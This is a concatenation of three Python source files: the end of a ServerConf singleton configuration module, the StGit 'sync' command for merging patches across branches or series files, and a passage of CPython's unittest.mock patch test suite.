takes only the `self` argument. Other than that, there are
no restrictions that apply to the decorated class.
To get the singleton instance, use the `Instance` method. Trying
to use `__call__` will result in a `TypeError` being raised.
Limitations: The decorated class cannot be inherited from.
"""
def __init__(self, decorated):
self._decorated = decorated
def Instance(self):
"""
Returns the singleton instance. Upon its first call, it creates a
new instance of the decorated class and calls its `__init__` method.
On all subsequent calls, the already created instance is returned.
"""
try:
return self._instance
except AttributeError:
self._instance = self._decorated()
return self._instance
def __call__(self):
raise TypeError('Singletons must be accessed through `Instance()`.')
def __instancecheck__(self, inst):
return isinstance(inst, self._decorated)
@Singleton
class ServerConf():
# Version of the configuration JSON file
def __init__(self):
self._data = {}
self.VERSION = '0.2.0'
self._data['gem_repo'] = 'http://rubygems.org'
self._data['version'] = self.VERSION
self._data['organization'] = ''
self._chef_conf = ChefConf()
self._gcc_conf = GCCConf()
self._auth_conf = AuthConf()
self._ntp_conf = DateSyncConf()
self._users_conf = UsersConf()
def load_data(self, conf):
msg = 'ServerConf: Key "%s" not found in the configuration file.'
try:
v = conf['version']
if v != self.VERSION:
print 'WARNING: ServerConf and AUTOCONFIG_JSON version mismatch!'
except KeyError as e:
print msg % ('version',)
try:
self.set_organization(conf['organization'])
except KeyError as e:
print msg % ('organization',)
try:
self.set_notes(conf['notes'])
except KeyError as e:
print msg % ('notes',)
try:
self.set_gem_repo(conf['gem_repo'])
except KeyError as e:
print msg % ('gem_repo',)
try:
self._chef_conf.load_data(conf['chef'])
except KeyError as e:
print msg % ('chef',)
try:
self._gcc_conf.load_data(conf['gcc'])
except KeyError as e:
print msg % ('gcc',)
try:
self._auth_conf.load_data(conf['auth'])
except KeyError as e:
print msg % ('auth',)
try:
self._ntp_conf.load_data(conf['uri_ntp'])
except KeyError as e:
print msg % ('ntp',)
def validate(self):
valid = len(self._data['version']) > 0 \
and self._chef_conf.validate() \
and self._auth_conf.validate() \
and self._ntp_conf.validate() \
and self._gcc_conf.validate()
return valid
def set_gem_repo(self, repo):
self._data['gem_repo'] = repo
return self
def get_gem_repo(self):
return self._data['gem_repo'].encode('utf-8')
def get_version(self):
return self._data['version'].encode('utf-8')
def set_version(self, version):
self._data['version'] = version
return self
def get_organization(self):
return self._data['organization'].encode('utf-8')
def set_organization(self, organization):
self._data['organization'] = organization
return self
def get_notes(self):
return self._data['notes'].encode('utf-8')
def set_notes(self, notes):
self._data['notes'] = notes
return self
def get_auth_conf(self):
return self._auth_conf
def get_chef_conf(self):
return self._chef_conf
def get_ntp_conf(self):
return self._ntp_conf
def get_gcc_conf(self):
return self._gcc_conf
def get_users_conf(self):
return self._users_conf
def set_auth_conf(self, auth_conf):
self._auth_conf = auth_conf
return self
def set_chef_conf(self, chef_conf):
self._chef_conf = chef_conf
return self
def set_ntp_conf(self, ntp_conf):
self._ntp_conf = ntp_conf
return self
def set_gcc_conf(self, gcc_conf):
self._gcc_conf = gcc_conf
return gcc_conf
def set_users_conf(self, user_conf):
self._users_conf = user_conf
return self
| rcmorano/gecosws-config-assistant | firstboot/serverconf/ServerConf.py | Python | gpl-2.0 | 5,970 |
__copyright__ = """
Copyright (C) 2006, Catalin Marinas <catalin.marinas@gmail.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2 as
published by the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
import sys, os
import stgit.commands.common
from stgit.argparse import opt
from stgit.commands.common import *
from stgit.utils import *
from stgit.out import *
from stgit import argparse, stack, git
help = 'Synchronise patches with a branch or a series'
kind = 'patch'
usage = ['[options] [<patch1>] [<patch2>] [<patch3>..<patch4>]']
description = """
For each of the specified patches perform a three-way merge with the
same patch in the specified branch or series. The command can be used
for keeping patches on several branches in sync. Note that the
operation may fail for some patches because of conflicts. The patches
in the series must apply cleanly."""
args = [argparse.patch_range(argparse.applied_patches,
argparse.unapplied_patches)]
options = [
opt('-a', '--all', action = 'store_true',
short = 'Synchronise all the applied patches'),
opt('-B', '--ref-branch', args = [argparse.stg_branches],
short = 'Syncronise patches with BRANCH'),
opt('-s', '--series', args = [argparse.files],
short = 'Syncronise patches with SERIES')]
directory = DirectoryGotoToplevel(log = True)
def __check_all():
check_local_changes()
check_conflicts()
check_head_top_equal(crt_series)
def __branch_merge_patch(remote_series, pname):
"""Merge a patch from a remote branch into the current tree.
"""
patch = remote_series.get_patch(pname)
git.merge_recursive(patch.get_bottom(), git.get_head(), patch.get_top())
def __series_merge_patch(base, patchdir, pname):
"""Merge a patch file with the given StGIT patch.
"""
patchfile = os.path.join(patchdir, pname)
git.apply_patch(filename = patchfile, base = base)
def func(parser, options, args):
"""Synchronise a range of patches
"""
if options.ref_branch:
remote_series = stack.Series(options.ref_branch)
if options.ref_branch == crt_series.get_name():
raise CmdException, 'Cannot synchronise with the current branch'
remote_patches = remote_series.get_applied()
# the merge function merge_patch(patch, pname)
merge_patch = lambda patch, pname: \
__branch_merge_patch(remote_series, pname)
elif options.series:
patchdir = os.path.dirname(options.series)
remote_patches = []
f = file(options.series)
for line in f:
p = re.sub('#.*$', '', line).strip()
if not p:
continue
remote_patches.append(p)
f.close()
# the merge function merge_patch(patch, pname)
merge_patch = lambda patch, pname: \
__series_merge_patch(patch.get_bottom(), patchdir, pname)
else:
raise CmdException, 'No remote branch or series specified'
applied = crt_series.get_applied()
unapplied = crt_series.get_unapplied()
if options.all:
patches = applied
elif len(args) != 0:
patches = parse_patches(args, applied + unapplied, len(applied),
ordered = True)
elif applied:
patches = [crt_series.get_current()]
else:
parser.error('no patches applied')
if not patches:
raise CmdException, 'No patches to synchronise'
__check_all()
# only keep the patches to be synchronised
sync_patches = [p for p in patches if p in remote_patches]
if not sync_patches:
raise CmdException, 'No common patches to be synchronised'
# pop to the one before the first patch to be synchronised
first_patch = sync_patches[0]
if first_patch in applied:
to_pop = applied[applied.index(first_patch) + 1:]
if to_pop:
pop_patches(crt_series, to_pop[::-1])
pushed = [first_patch]
else:
to_pop = []
pushed = []
popped = to_pop + [p for p in patches if p in unapplied]
for p in pushed + popped:
if p in popped:
# push this patch
push_patches(crt_series, [p])
if p not in sync_patches:
# nothing to synchronise
continue
# the actual sync
out.start('Synchronising "%s"' % p)
patch = crt_series.get_patch(p)
bottom = patch.get_bottom()
top = patch.get_top()
# reset the patch backup information.
patch.set_top(top, backup = True)
# the actual merging (either from a branch or an external file)
merge_patch(patch, p)
if git.local_changes(verbose = False):
# index (cache) already updated by the git merge. The
# backup information was already reset above
crt_series.refresh_patch(cache_update = False, backup = False,
log = 'sync')
out.done('updated')
else:
out.done()
| miracle2k/stgit | stgit/commands/sync.py | Python | gpl-2.0 | 5,549 |
# Copyright (C) 2007-2012 Michael Foord & the mock team
# E-mail: fuzzyman AT voidspace DOT org DOT uk
# http://www.voidspace.org.uk/python/mock/
import os
import sys
import unittest
from unittest.test.testmock import support
from unittest.test.testmock.support import SomeClass, is_instance
from test.test_importlib.util import uncache
from unittest.mock import (
NonCallableMock, CallableMixin, sentinel,
MagicMock, Mock, NonCallableMagicMock, patch, _patch,
DEFAULT, call, _get_target
)
builtin_string = 'builtins'
PTModule = sys.modules[__name__]
MODNAME = '%s.PTModule' % __name__
def _get_proxy(obj, get_only=True):
class Proxy(object):
def __getattr__(self, name):
return getattr(obj, name)
if not get_only:
def __setattr__(self, name, value):
setattr(obj, name, value)
def __delattr__(self, name):
delattr(obj, name)
Proxy.__setattr__ = __setattr__
Proxy.__delattr__ = __delattr__
return Proxy()
# for use in the test
something = sentinel.Something
something_else = sentinel.SomethingElse
class Foo(object):
def __init__(self, a):
pass
def f(self, a):
pass
def g(self):
pass
foo = 'bar'
class Bar(object):
def a(self):
pass
foo_name = '%s.Foo' % __name__
def function(a, b=Foo):
pass
class Container(object):
def __init__(self):
self.values = {}
def __getitem__(self, name):
return self.values[name]
def __setitem__(self, name, value):
self.values[name] = value
def __delitem__(self, name):
del self.values[name]
def __iter__(self):
return iter(self.values)
class PatchTest(unittest.TestCase):
def assertNotCallable(self, obj, magic=True):
MockClass = NonCallableMagicMock
if not magic:
MockClass = NonCallableMock
self.assertRaises(TypeError, obj)
self.assertTrue(is_instance(obj, MockClass))
self.assertFalse(is_instance(obj, CallableMixin))
def test_single_patchobject(self):
class Something(object):
attribute = sentinel.Original
@patch.object(Something, 'attribute', sentinel.Patched)
def test():
self.assertEqual(Something.attribute, sentinel.Patched, "unpatched")
test()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
def test_patchobject_with_none(self):
class Something(object):
attribute = sentinel.Original
@patch.object(Something, 'attribute', None)
def test():
self.assertIsNone(Something.attribute, "unpatched")
test()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
def test_multiple_patchobject(self):
class Something(object):
attribute = sentinel.Original
next_attribute = sentinel.Original2
@patch.object(Something, 'attribute', sentinel.Patched)
@patch.object(Something, 'next_attribute', sentinel.Patched2)
def test():
self.assertEqual(Something.attribute, sentinel.Patched,
"unpatched")
self.assertEqual(Something.next_attribute, sentinel.Patched2,
"unpatched")
test()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
self.assertEqual(Something.next_attribute, sentinel.Original2,
"patch not restored")
def test_object_lookup_is_quite_lazy(self):
global something
original = something
@patch('%s.something' % __name__, sentinel.Something2)
def test():
pass
try:
something = sentinel.replacement_value
test()
self.assertEqual(something, sentinel.replacement_value)
finally:
something = original
def test_patch(self):
@patch('%s.something' % __name__, sentinel.Something2)
def test():
self.assertEqual(PTModule.something, sentinel.Something2,
"unpatched")
test()
self.assertEqual(PTModule.something, sentinel.Something,
"patch not restored")
@patch('%s.something' % __name__, sentinel.Something2)
@patch('%s.something_else' % __name__, sentinel.SomethingElse)
def test():
self.assertEqual(PTModule.something, sentinel.Something2,
"unpatched")
self.assertEqual(PTModule.something_else, sentinel.SomethingElse,
"unpatched")
self.assertEqual(PTModule.something, sentinel.Something,
"patch not restored")
self.assertEqual(PTModule.something_else, sentinel.SomethingElse,
"patch not restored")
# Test the patching and restoring works a second time
test()
self.assertEqual(PTModule.something, sentinel.Something,
"patch not restored")
self.assertEqual(PTModule.something_else, sentinel.SomethingElse,
"patch not restored")
mock = Mock()
mock.return_value = sentinel.Handle
@patch('%s.open' % builtin_string, mock)
def test():
self.assertEqual(open('filename', 'r'), sentinel.Handle,
"open not patched")
test()
test()
self.assertNotEqual(open, mock, "patch not restored")
def test_patch_class_attribute(self):
@patch('%s.SomeClass.class_attribute' % __name__,
sentinel.ClassAttribute)
def test():
self.assertEqual(PTModule.SomeClass.class_attribute,
sentinel.ClassAttribute, "unpatched")
test()
self.assertIsNone(PTModule.SomeClass.class_attribute,
"patch not restored")
def test_patchobject_with_default_mock(self):
class Test(object):
something = sentinel.Original
something2 = sentinel.Original2
@patch.object(Test, 'something')
def test(mock):
self.assertEqual(mock, Test.something,
"Mock not passed into test function")
self.assertIsInstance(mock, MagicMock,
"patch with two arguments did not create a mock")
test()
@patch.object(Test, 'something')
@patch.object(Test, 'something2')
def test(this1, this2, mock1, mock2):
self.assertEqual(this1, sentinel.this1,
"Patched function didn't receive initial argument")
self.assertEqual(this2, sentinel.this2,
"Patched function didn't receive second argument")
self.assertEqual(mock1, Test.something2,
"Mock not passed into test function")
self.assertEqual(mock2, Test.something,
"Second Mock not passed into test function")
self.assertIsInstance(mock2, MagicMock,
"patch with two arguments did not create a mock")
self.assertIsInstance(mock2, MagicMock,
"patch with two arguments did not create a mock")
# A hack to test that new mocks are passed the second time
self.assertNotEqual(outerMock1, mock1, "unexpected value for mock1")
self.assertNotEqual(outerMock2, mock2, "unexpected value for mock1")
return mock1, mock2
outerMock1 = outerMock2 = None
outerMock1, outerMock2 = test(sentinel.this1, sentinel.this2)
# Test that executing a second time creates new mocks
test(sentinel.this1, sentinel.this2)
def test_patch_with_spec(self):
@patch('%s.SomeClass' % __name__, spec=SomeClass)
def test(MockSomeClass):
self.assertEqual(SomeClass, MockSomeClass)
self.assertTrue(is_instance(SomeClass.wibble, MagicMock))
self.assertRaises(AttributeError, lambda: SomeClass.not_wibble)
test()
def test_patchobject_with_spec(self):
@patch.object(SomeClass, 'class_attribute', spec=SomeClass)
def test(MockAttribute):
self.assertEqual(SomeClass.class_attribute, MockAttribute)
self.assertTrue(is_instance(SomeClass.class_attribute.wibble,
MagicMock))
self.assertRaises(AttributeError,
lambda: SomeClass.class_attribute.not_wibble)
test()
def test_patch_with_spec_as_list(self):
@patch('%s.SomeClass' % __name__, spec=['wibble'])
def test(MockSomeClass):
self.assertEqual(SomeClass, MockSomeClass)
self.assertTrue(is_instance(SomeClass.wibble, MagicMock))
self.assertRaises(AttributeError, lambda: SomeClass.not_wibble)
test()
def test_patchobject_with_spec_as_list(self):
@patch.object(SomeClass, 'class_attribute', spec=['wibble'])
def test(MockAttribute):
self.assertEqual(SomeClass.class_attribute, MockAttribute)
self.assertTrue(is_instance(SomeClass.class_attribute.wibble,
MagicMock))
self.assertRaises(AttributeError,
lambda: SomeClass.class_attribute.not_wibble)
test()
def test_nested_patch_with_spec_as_list(self):
# regression test for nested decorators
@patch('%s.open' % builtin_string)
@patch('%s.SomeClass' % __name__, spec=['wibble'])
def test(MockSomeClass, MockOpen):
self.assertEqual(SomeClass, MockSomeClass)
self.assertTrue(is_instance(SomeClass.wibble, MagicMock))
self.assertRaises(AttributeError, lambda: SomeClass.not_wibble)
test()
def test_patch_with_spec_as_boolean(self):
@patch('%s.SomeClass' % __name__, spec=True)
def test(MockSomeClass):
self.assertEqual(SomeClass, MockSomeClass)
# Should not raise attribute error
MockSomeClass.wibble
self.assertRaises(AttributeError, lambda: MockSomeClass.not_wibble)
test()
def test_patch_object_with_spec_as_boolean(self):
@patch.object(PTModule, 'SomeClass', spec=True)
def test(MockSomeClass):
self.assertEqual(SomeClass, MockSomeClass)
# Should not raise attribute error
MockSomeClass.wibble
self.assertRaises(AttributeError, lambda: MockSomeClass.not_wibble)
test()
def test_patch_class_acts_with_spec_is_inherited(self):
@patch('%s.SomeClass' % __name__, spec=True)
def test(MockSomeClass):
self.assertTrue(is_instance(MockSomeClass, MagicMock))
instance = MockSomeClass()
self.assertNotCallable(instance)
# Should not raise attribute error
instance.wibble
self.assertRaises(AttributeError, lambda: instance.not_wibble)
test()
def test_patch_with_create_mocks_non_existent_attributes(self):
@patch('%s.frooble' % builtin_string, sentinel.Frooble, create=True)
def test():
self.assertEqual(frooble, sentinel.Frooble)
test()
self.assertRaises(NameError, lambda: frooble)
def test_patchobject_with_create_mocks_non_existent_attributes(self):
@patch.object(SomeClass, 'frooble', sentinel.Frooble, create=True)
def test():
self.assertEqual(SomeClass.frooble, sentinel.Frooble)
test()
self.assertFalse(hasattr(SomeClass, 'frooble'))
def test_patch_wont_create_by_default(self):
try:
@patch('%s.frooble' % builtin_string, sentinel.Frooble)
def test():
self.assertEqual(frooble, sentinel.Frooble)
test()
except AttributeError:
pass
else:
self.fail('Patching non existent attributes should fail')
self.assertRaises(NameError, lambda: frooble)
def test_patchobject_wont_create_by_default(self):
try:
@patch.object(SomeClass, 'ord', sentinel.Frooble)
def test():
self.fail('Patching non existent attributes should fail')
test()
except AttributeError:
pass
else:
self.fail('Patching non existent attributes should fail')
self.assertFalse(hasattr(SomeClass, 'ord'))
def test_patch_builtins_without_create(self):
@patch(__name__+'.ord')
def test_ord(mock_ord):
mock_ord.return_value = 101
return ord('c')
@patch(__name__+'.open')
def test_open(mock_open):
m = mock_open.return_value
m.read.return_value = 'abcd'
fobj = open('doesnotexists.txt')
data = fobj.read()
fobj.close()
return data
self.assertEqual(test_ord(), 101)
self.assertEqual(test_open(), 'abcd')
def test_patch_with_static_methods(self):
class Foo(object):
@staticmethod
def woot():
return sentinel.Static
@patch.object(Foo, 'woot', staticmethod(lambda: sentinel.Patched))
def anonymous():
self.assertEqual(Foo.woot(), sentinel.Patched)
anonymous()
self.assertEqual(Foo.woot(), sentinel.Static)
def test_patch_local(self):
foo = sentinel.Foo
@patch.object(sentinel, 'Foo', 'Foo')
def anonymous():
self.assertEqual(sentinel.Foo, 'Foo')
anonymous()
self.assertEqual(sentinel.Foo, foo)
def test_patch_slots(self):
class Foo(object):
__slots__ = ('Foo',)
foo = Foo()
foo.Foo = sentinel.Foo
@patch.object(foo, 'Foo', 'Foo')
def anonymous():
self.assertEqual(foo.Foo, 'Foo')
anonymous()
self.assertEqual(foo.Foo, sentinel.Foo)
def test_patchobject_class_decorator(self):
class Something(object):
attribute = sentinel.Original
class Foo(object):
def test_method(other_self):
self.assertEqual(Something.attribute, sentinel.Patched,
"unpatched")
def not_test_method(other_self):
self.assertEqual(Something.attribute, sentinel.Original,
"non-test method patched")
Foo = patch.object(Something, 'attribute', sentinel.Patched)(Foo)
f = Foo()
f.test_method()
f.not_test_method()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
def test_patch_class_decorator(self):
class Something(object):
attribute = sentinel.Original
class Foo(object):
def test_method(other_self, mock_something):
self.assertEqual(PTModule.something, mock_something,
"unpatched")
def not_test_method(other_self):
self.assertEqual(PTModule.something, sentinel.Something,
"non-test method patched")
Foo = patch('%s.something' % __name__)(Foo)
f = Foo()
f.test_method()
f.not_test_method()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
self.assertEqual(PTModule.something, sentinel.Something,
"patch not restored")
def test_patchobject_twice(self):
class Something(object):
attribute = sentinel.Original
next_attribute = sentinel.Original2
@patch.object(Something, 'attribute', sentinel.Patched)
@patch.object(Something, 'attribute', sentinel.Patched)
def test():
self.assertEqual(Something.attribute, sentinel.Patched, "unpatched")
test()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
def test_patch_dict(self):
foo = {'initial': object(), 'other': 'something'}
original = foo.copy()
@patch.dict(foo)
def test():
foo['a'] = 3
del foo['initial']
foo['other'] = 'something else'
test()
self.assertEqual(foo, original)
@patch.dict(foo, {'a': 'b'})
def test():
self.assertEqual(len(foo), 3)
self.assertEqual(foo['a'], 'b')
test()
self.assertEqual(foo, original)
@patch.dict(foo, [('a', 'b')])
def test():
self.assertEqual(len(foo), 3)
self.assertEqual(foo['a'], 'b')
test()
self.assertEqual(foo, original)
def test_patch_dict_with_container_object(self):
foo = Container()
foo['initial'] = object()
foo['other'] = 'something'
original = foo.values.copy()
@patch.dict(foo)
def test():
foo['a'] = 3
del foo['initial']
foo['other'] = 'something else'
test()
self.assertEqual(foo.values, original)
@patch.dict(foo, {'a': 'b'})
def test():
self.assertEqual(len(foo.values), 3)
self.assertEqual(foo['a'], 'b')
test()
self.assertEqual(foo.values, original)
def test_patch_dict_with_clear(self):
foo = {'initial': object(), 'other': 'something'}
original = foo.copy()
@patch.dict(foo, clear=True)
def test():
self.assertEqual(foo, {})
foo['a'] = 3
foo['other'] = 'something else'
test()
self.assertEqual(foo, original)
@patch.dict(foo, {'a': 'b'}, clear=True)
def test():
self.assertEqual(foo, {'a': 'b'})
test()
self.assertEqual(foo, original)
@patch.dict(foo, [('a', 'b')], clear=True)
def test():
self.assertEqual(foo, {'a': 'b'})
test()
self.assertEqual(foo, original)
def test_patch_dict_with_container_object_and_clear(self):
foo = Container()
foo['initial'] = object()
foo['other'] = 'something'
original = foo.values.copy()
@patch.dict(foo, clear=True)
def test():
self.assertEqual(foo.values, {})
foo['a'] = 3
foo['other'] = 'something else'
test()
self.assertEqual(foo.values, original)
@patch.dict(foo, {'a': 'b'}, clear=True)
def test():
self.assertEqual(foo.values, {'a': 'b'})
test()
self.assertEqual(foo.values, original)
def test_name_preserved(self):
foo = {}
@patch('%s.SomeClass' % __name__, object())
@patch('%s.SomeClass' % __name__, object(), autospec=True)
@patch.object(SomeClass, object())
@patch.dict(foo)
def some_name():
pass
self.assertEqual(some_name.__name__, 'some_name')
def test_patch_with_exception(self):
foo = {}
@patch.dict(foo, {'a': 'b'})
def test():
raise NameError('Konrad')
try:
test()
except NameError:
pass
else:
self.fail('NameError not raised by test')
self.assertEqual(foo, {})
def test_patch_dict_with_string(self):
@patch.dict('os.environ', {'konrad_delong': 'some value'})
def test():
self.assertIn('konrad_delong', os.environ)
test()
def test_patch_descriptor(self):
# would be some effort to fix this - we could special case the
# builtin descriptors: classmethod, property, staticmethod
return
class Nothing(object):
foo = None
class Something(object):
foo = {}
@patch.object(Nothing, 'foo', 2)
@classmethod
def klass(cls):
self.assertIs(cls, Something)
@patch.object(Nothing, 'foo', 2)
@staticmethod
def static(arg):
return arg
@patch.dict(foo)
@classmethod
def klass_dict(cls):
self.assertIs(cls, Something)
@patch.dict(foo)
@staticmethod
def static_dict(arg):
return arg
# these will raise exceptions if patching descriptors is broken
self.assertEqual(Something.static('f00'), 'f00')
Something.klass()
self.assertEqual(Something.static_dict('f00'), 'f00')
Something.klass_dict()
something = Something()
self.assertEqual(something.static('f00'), 'f00')
something.klass()
self.assertEqual(something.static_dict('f00'), 'f00')
something.klass_dict()
def test_patch_spec_set(self):
@patch('%s.SomeClass' % __name__, spec=SomeClass, spec_set=True)
def test(MockClass):
MockClass.z = 'foo'
self.assertRaises(AttributeError, test)
@patch.object(support, 'SomeClass', spec=SomeClass, spec_set=True)
def test(MockClass):
MockClass.z = 'foo'
self.assertRaises(AttributeError, test)
@patch('%s.SomeClass' % __name__, spec_set=True)
def test(MockClass):
MockClass.z = 'foo'
self.assertRaises(AttributeError, test)
@patch.object(support, 'SomeClass', spec_set=True)
def test(MockClass):
MockClass.z = 'foo'
self.assertRaises(AttributeError, test)
def test_spec_set_inherit(self):
@patch('%s.SomeClass' % __name__, spec_set=True)
def test(MockClass):
instance = MockClass()
instance.z = 'foo'
self.assertRaises(AttributeError, test)
def test_patch_start_stop(self):
original = something
patcher = patch('%s.something' % __name__)
self.assertIs(something, original)
mock = patcher.start()
try:
self.assertIsNot(mock, original)
self.assertIs(something, mock)
finally:
patcher.stop()
self.assertIs(something, original)
def test_stop_without_start(self):
patcher = patch(foo_name, 'bar', 3)
# calling stop without start used to produce a very obscure error
self.assertRaises(RuntimeError, patcher.stop)
def test_patchobject_start_stop(self):
original = something
patcher = patch.object(PTModule, 'something', 'foo')
self.assertIs(something, original)
replaced = patcher.start()
try:
self.assertEqual(replaced, 'foo')
self.assertIs(something, replaced)
finally:
patcher.stop()
self.assertIs(something, original)
def test_patch_dict_start_stop(self):
d = {'foo': 'bar'}
original = d.copy()
patcher = patch.dict(d, [('spam', 'eggs')], clear=True)
self.assertEqual(d, original)
patcher.start()
try:
self.assertEqual(d, {'spam': 'eggs'})
finally:
patcher.stop()
self.assertEqual(d, original)
def test_patch_dict_class_decorator(self):
this = self
d = {'spam': 'eggs'}
original = d.copy()
class Test(object):
def test_first(self):
this.assertEqual(d, {'foo': 'bar'})
def test_second(self):
this.assertEqual(d, {'foo': 'bar'})
Test = patch.dict(d, {'foo': 'bar'}, clear=True)(Test)
self.assertEqual(d, original)
test = Test()
test.test_first()
self.assertEqual(d, original)
test.test_second()
self.assertEqual(d, original)
test = Test()
test.test_first()
self.assertEqual(d, original)
test.test_second()
self.assertEqual(d, original)
def test_get_only_proxy(self):
class Something(object):
foo = 'foo'
class SomethingElse:
foo = 'foo'
for thing in Something, SomethingElse, Something(), SomethingElse:
proxy = _get_proxy(thing)
@patch.object(proxy, 'foo', 'bar')
def test():
self.assertEqual(proxy.foo, 'bar')
test()
self.assertEqual(proxy.foo, 'foo')
self.assertEqual(thing.foo, 'foo')
self.assertNotIn('foo', proxy.__dict__)
def test_get_set_delete_proxy(self):
class Something(object):
foo = 'foo'
class SomethingElse:
foo = 'foo'
for thing in Something, SomethingElse, Something(), SomethingElse:
proxy = _get_proxy(Something, get_only=False)
@patch.object(proxy, 'foo', 'bar')
def test():
self.assertEqual(proxy.foo, 'bar')
test()
self.assertEqual(proxy.foo, 'foo')
self.assertEqual(thing.foo, 'foo')
self.assertNotIn('foo', proxy.__dict__)
def test_patch_keyword_args(self):
kwargs = {'side_effect': KeyError, 'foo.bar.return_value': 33,
'foo': MagicMock()}
patcher = patch(foo_name, **kwargs)
mock = patcher.start()
patcher.stop()
self.assertRaises(KeyError, mock)
self.assertEqual(mock.foo.bar(), 33)
self.assertIsInstance(mock.foo, MagicMock)
def test_patch_object_keyword_args(self):
kwargs = {'side_effect': KeyError, 'foo.bar.return_value': 33,
'foo': MagicMock()}
patcher = patch.object(Foo, 'f', **kwargs)
mock = patcher.start()
patcher.stop()
self.assertRaises(KeyError, mock)
self.assertEqual(mock.foo.bar(), 33)
self.assertIsInstance(mock.foo, MagicMock)
def test_patch_dict_keyword_args(self):
original = {'foo': 'bar'}
copy = original.copy()
patcher = patch.dict(original, foo=3, bar=4, baz=5)
patcher.start()
try:
self.assertEqual(original, dict(foo=3, bar=4, baz=5))
finally:
patcher.stop()
self.assertEqual(original, copy)
def test_autospec(self):
class Boo(object):
def __init__(self, a):
pass
def f(self, a):
pass
def g(self):
pass
foo = 'bar'
class Bar(object):
def a(self):
pass
def _test(mock):
mock(1)
mock.assert_called_with(1)
self.assertRaises(TypeError, mock)
def _test2(mock):
mock.f(1)
mock.f.assert_called_with(1)
self.assertRaises(TypeError, mock.f)
mock.g()
mock.g.assert_called_with()
self.assertRaises(TypeError, mock.g, 1)
self.assertRaises(AttributeError, getattr, mock, 'h')
mock.foo.lower()
mock.foo.lower.assert_called_with()
self.assertRaises(AttributeError, getattr, mock.foo, 'bar')
mock.Bar()
mock.Bar.assert_called_with()
mock.Bar.a()
mock.Bar.a.assert_called_with()
self.assertRaises(TypeError, mock.Bar.a, 1)
mock.Bar().a()
mock.Bar().a.assert_called_with()
self.assertRaises(TypeError, mock.Bar().a, 1)
self.assertRaises(AttributeError, getattr, mock.Bar, 'b')
self.assertRaises(AttributeError, getattr, mock.Bar(), 'b')
def function(mock):
_test(mock)
_test2(mock)
_test2(mock(1))
self.assertIs(mock, Foo)
return mock
test = patch(foo_name, autospec=True)(function)
mock = test()
self.assertIsNot(Foo, mock)
# test patching a second time works
test()
module = sys.modules[__name__]
test = patch.object(module, 'Foo', autospec=True)(function)
mock = test()
self.assertIsNot(Foo, mock)
# test patching a second time works
test()
def test_autospec_function(self):
@patch('%s.function' % __name__, autospec=True)
def test(mock):
function.assert_not_called()
self.assertRaises(AssertionError, function.assert_called)
self.assertRaises(AssertionError, function.assert_called_once)
function(1)
self.assertRaises(AssertionError, function.assert_not_called)
function.assert_called_with(1)
function.assert_called()
function.assert_called_once()
function(2, 3)
function.assert_called_with(2, 3)
self.assertRaises(TypeError, function)
self.assertRaises(AttributeError, getattr, function, 'foo')
test()
def test_autospec_keywords(self):
@patch('%s.function' % __name__, autospec=True,
return_value=3)
def test(mock_function):
#self.assertEqual(function.abc, 'foo')
return function(1, 2)
result = test()
self.assertEqual(result, 3)
def test_autospec_with_new(self):
patcher = patch('%s.function' % __name__, new=3, autospec=True)
self.assertRaises(TypeError, patcher.start)
module = sys.modules[__name__]
patcher = patch.object(module, 'function', new=3, autospec=True)
self.assertRaises(TypeError, patcher.start)
def test_autospec_with_object(self):
class Bar(Foo):
extra = []
patcher = patch(foo_name, autospec=Bar)
mock = patcher.start()
try:
self.assertIsInstance(mock, Bar)
self.assertIsInstance(mock.extra, list)
finally:
patcher.stop()
def test_autospec_inherits(self):
FooClass = Foo
patcher = patch(foo_name, autospec=True)
mock = patcher.start()
try:
self.assertIsInstance(mock, FooClass)
self.assertIsInstance(mock(3), FooClass)
finally:
patcher.stop()
def test_autospec_name(self):
patcher = patch(foo_name, autospec=True)
mock = patcher.start()
try:
self.assertIn(" name='Foo'", repr(mock))
self.assertIn(" name='Foo.f'", repr(mock.f))
self.assertIn(" name='Foo()'", repr(mock(None)))
self.assertIn(" name='Foo().f'", repr(mock(None).f))
finally:
patcher.stop()
def test_tracebacks(self):
@patch.object(Foo, 'f', object())
def test():
raise AssertionError
try:
test()
except:
err = sys.exc_info()
result = unittest.TextTestResult(None, None, 0)
traceback = result._exc_info_to_string(err, self)
self.assertIn('raise AssertionError', traceback)
def test_new_callable_patch(self):
patcher = patch(foo_name, new_callable=NonCallableMagicMock)
m1 = patcher.start()
patcher.stop()
m2 = patcher.start()
patcher.stop()
self.assertIsNot(m1, m2)
for mock in m1, m2:
self.assertNotCallable(m1)
def test_new_callable_patch_object(self):
patcher = patch.object(Foo, 'f', new_callable=NonCallableMagicMock)
m1 = patcher.start()
patcher.stop()
m2 = patcher.start()
patcher.stop()
self.assertIsNot(m1, m2)
for mock in m1, m2:
self.assertNotCallable(m1)
def test_new_callable_keyword_arguments(self):
class Bar(object):
kwargs = None
def __init__(self, **kwargs):
Bar.kwargs = kwargs
patcher = patch(foo_name, new_callable=Bar, arg1=1, arg2=2)
m = patcher.start()
try:
self.assertIs(type(m), Bar)
self.assertEqual(Bar.kwargs, dict(arg1=1, arg2=2))
finally:
patcher.stop()
def test_new_callable_spec(self):
class Bar(object):
kwargs = None
def __init__(self, **kwargs):
Bar.kwargs = kwargs
patcher = patch(foo_name, new_callable=Bar, spec=Bar)
patcher.start()
try:
self.assertEqual(Bar.kwargs, dict(spec=Bar))
finally:
patcher.stop()
patcher = patch(foo_name, new_callable=Bar, spec_set=Bar)
patcher.start()
try:
self.assertEqual(Bar.kwargs, dict(spec_set=Bar))
finally:
patcher.stop()
def test_new_callable_create(self):
non_existent_attr = '%s.weeeee' % foo_name
p = patch(non_existent_attr, new_callable=NonCallableMock)
self.assertRaises(AttributeError, p.start)
p = patch(non_existent_attr, new_callable=NonCallableMock,
create=True)
m = p.start()
try:
self.assertNotCallable(m, magic=False)
finally:
p.stop()
